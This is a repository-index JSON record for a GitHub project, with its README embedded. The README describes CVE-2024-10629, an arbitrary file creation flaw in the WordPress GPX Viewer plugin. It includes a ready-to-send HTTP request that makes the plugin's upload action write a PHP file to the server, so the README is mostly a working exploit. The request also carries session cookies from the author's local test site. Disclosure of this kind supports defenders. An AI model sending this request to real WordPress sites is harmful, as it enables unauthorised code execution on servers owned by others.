{"id":21125663,"url":"https://github.com/randomrobbiebf/cve-2024-10629","last_synced_at":"2026-01-01T22:50:33.339Z","repository":{"id":262483093,"uuid":"887379678","full_name":"RandomRobbieBF/CVE-2024-10629","owner":"RandomRobbieBF","description":"GPX Viewer \u003c= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation","archived":false,"fork":false,"pushed_at":"2024-11-12T16:38:19.000Z","size":3,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T05:41:41.955Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-12T16:36:20.000Z","updated_at":"2024-11-12T16:38:23.000Z","dependencies_parsed_at":"2024-11-12T17:48:43.396Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-10629","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-10629"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-10629","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-10629/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-10629/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-10629/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-10629/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573163,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:15.928Z","updated_at":"2026-01-01T22:50:33.283Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-10629\nGPX Viewer \u0026lt;= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation\n\n# Description:\nThe GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.\n\n\n```\nPublished: 2024-11-12 13:21:00\nCVE: CVE-2024-10629\nCVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\nCVSS Score: 8.8\nSlugs: gpx-viewer\n```\n\nPOC\n---\n\nLogin as a standard user\n\n```\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://kubernetes.docker.internal/wp-admin/admin.php?page=gpx_admin\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 127\nOrigin: http://kubernetes.docker.internal\nConnection: keep-alive\nCookie: tm_member=172.21.0.1; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C2d7486450bf41812303a58d1fbafe518ef19b8073d4e664c09bf94377ca17fe7; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D5%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; hashcaf=#layoutstab; hashcafsub=post-layout; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731498720%7C%7C1731495120%7C%7C2c258c1ff57491a59c854505530207f7; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C7e8c9e15242ca5cf7bc38fb82a5a51c0b8024a364cc5b62472935180754b64df; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731406964\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\n\naction=gpxv_file_upload\u0026category=uncategorized\u0026filename=example.php\u0026gpx=%3c%3fphp%20phpinfo()%3b%3f%3e\u0026update=false\u0026clean=false\n```\n\nGoes to `/wp-content/uploads/gpx/uncategorized/example.php`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-10629","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-10629","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-10629/lists"}